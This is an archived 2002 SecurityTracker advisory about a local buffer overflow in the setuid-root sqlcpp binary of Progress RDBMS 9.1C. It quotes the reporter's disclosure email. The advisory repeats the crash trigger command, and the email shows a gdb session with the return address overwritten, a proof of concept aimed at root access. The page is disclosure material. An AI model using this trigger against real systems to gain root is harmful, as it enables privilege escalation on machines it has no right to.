SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Database)  >  Progress Database Vendors:  Progress Software Corporation
Progress Database Buffer Overflow May Let Local Users Gain Root Privileges
Date:  Mar 25 2002
Impact:  Execution of arbitrary code via local system, Root access via local system
Version(s): 9.1C
Description:  Another buffer overflow vulnerability was reported in the Progress RDBMS. A local user may be able to execute arbitrary code on the system to gain root privileges.

A buffer overflow vulnerability has been reported in the sqlcpp binary, which is configured with set user id (suid) root privileges. A local user can reportedly trigger the overflow with the following type of command:

/usr/dlc/bin/./sqlcpp `perl -e 'print "A" x 9000'`

It is reported that it may be possible for the local user to cause arbitrary code to be executed via this buffer overflow. exploitstring:/usr/dlc/bin/./sqlcpp `perl -e 'print "A" x 9000'`
Impact:  A local user may be able to execute arbitrary code on the system with root privileges to gain root access on the system.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.progress.com/v9/datasheets/rdbms.htm (Links to External Site)
Cause:  Boundary error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (DGUX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)
Reported By:  KF <dotslash@snosoft.com>
Message History:   None.

 Source Message Contents
Date:  Fri, 22 Mar 2002 12:53:55 -0500
From:  KF <dotslash@snosoft.com>
Subject:  Progress Software suid overflows again. 

 

Yet another b0f in progress software due to p_stcopy()

Progress Software corp. http://www.progress.com STILL can't seem to 
validate user input... this is in their latest patch level for Progress 
9.1C

91C09.tar.Z

[root@localhost bin]# cat ../version
echo PROGRESS PATCH Version 9.1C09 as of February 26, 2002

[root@localhost bin]# ls -al sqlcpp
-rwsrwxr-x    1 root     root      2222278 Feb 26 08:17 sqlcpp

[root@localhost bin]# gdb -q ./sqlcpp
(gdb) r  `perl -e 'print "A" x 9000'`
Starting program: /usr/dlc/bin/./sqlcpp `perl -e 'print "A" x 9000'`

Program received signal SIGSEGV, Segmentation fault.
0x081f5670 in p_stcopy () at eval.c:41
41      eval.c: No such file or directory.
        in eval.c
(gdb) bt
#0  0x081f5670 in p_stcopy () at eval.c:41
#1  0x080b03a0 in sqlppgdst () at eval.c:41
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

Progress was NOT notified due to the number of times I have tryed to 
tell them how to fix their software.... I have ran out of fingers and 
toes to count Progress holes on.

-KF


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC